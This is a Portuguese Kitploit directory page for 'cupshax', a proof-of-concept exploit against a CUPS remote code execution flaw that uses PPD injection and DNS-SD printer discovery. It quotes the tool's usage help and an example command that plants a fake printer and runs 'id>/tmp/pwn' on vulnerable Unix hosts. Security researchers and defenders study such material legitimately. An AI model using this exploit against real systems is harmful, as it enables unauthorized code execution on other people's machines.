Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cupshax — Prova de conceito rápida para a exploração recente do CUPS que permite execução remota de código via injeção de PPD e descoberta de impressoras via DNS-SD. Executa comandos arbitrários em sistemas Unix vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/rickdejager/cupshax
ReconhecimentoMapeamento de RedeExploraçãoTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubrickdejager/cupshax

cupshax

Prova de conceito rápida para a exploração recente do CUPS que permite execução remota de código via injeção de PPD e descoberta de impressoras via DNS-SD. Executa comandos arbitrários em sistemas Unix vulneráveis.

Ver Repositório
230585há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CUPSHax

Prova de conceito rápida para o exploit recente do CUPS. Eu planejava limpá-lo muito mais, mas o embargo foi levantado muito antes do esperado, então o código está um pouco corrido.

Para todos os detalhes técnicos, sinceramente, você deveria apenas ler o artigo do Evilsocket.

Este exploit foi escrito após identificar este commit no repositório público OpenPrinting CUPS. Provavelmente existem pontos de injeção mais limpos.

Este PoC usa a descoberta de impressoras via dns-sd, portanto o alvo deve ser capaz de receber a mensagem de broadcast, ou seja, estar na mesma rede.

Uso

O exploit usa zeroconf e ippserver, ambos podem ser instalados via pip.

root@kitploit:~
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT] [--base64 | --no-base64]

A CUPS PPD injection PoC

options:
  -h, --help            show this help message and exit
  --name NAME           The name to use (default: RCE Printer)
  --ip IP               The IP address of the machine running this script
  --command COMMAND     The command to execute (default: 'touch /tmp/pwn')
  --port PORT           The port to connect on (default: 8631)
  --base64, --no-base64
                        Wrap the command in base64 (default: enabled)

Por exemplo:

root@kitploit:~
python cupshax.py --name "Print to PDF (Color)" \
                  --command "id>/tmp/pwn" \
                  --ip 10.0.0.3
Baixar ferramenta